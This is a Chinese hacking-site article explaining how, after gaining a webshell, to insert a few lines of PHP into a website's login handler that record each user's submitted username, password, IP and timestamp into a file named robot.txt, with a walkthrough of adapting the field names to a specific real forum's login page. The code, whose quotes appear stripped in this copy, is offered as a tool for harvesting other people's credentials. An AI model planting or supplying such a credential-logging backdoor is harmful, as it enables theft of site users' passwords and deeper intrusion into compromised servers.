Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

【原创】万能截取php后台登陆密码代码

来源: 未知 分享至:

拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。


 if($_POST[loginsubmit]!=){      //判断是否点了登陆按钮
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn;     // 把POST接收到的值 连起来赋值给变量$sb
fwrite(fopen(robot.txt,ab),$sb);}   //结果写入一个文件
 


下面简单分析一下,以华夏的登陆页面为例。打开bbs.77169.com/login.php  右键查看源码,CTRL+F搜索action找到登陆的表单。

我只复制了关键代码过来.


 <form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;>    //action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的  method为POST,所以用$_POST接收。

。。。。强大的省略号。。。。。。

                                <TR>
                                <TD height=40>账号(<U>U</U>):<BR>
                                    <INPUT
                                class=input id=pwuser accessKey=u size=16
                                name=pwuser> </TD></TR>         //用户名的input输入框,      注意其name的值,  要和$_POST[username] 这里面的对应,      所以要截取华夏的密码,需要改为        $_POST[pwuser]  

                                 <TR>
                                <TD height=40>密 码(<U>P</U>):<BR><INPUT 
                                class=input id=pwpwd accessKey=p
                                type=password size=16 name=pwpwd> </TD></TR>   //用户名的input输入框,      注意其name的值,  要和$_POST[username] 这里面的对应,      所以要截取华夏的密码,需要改为        $_POST[pwpwd]   
 
 


Tags:
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史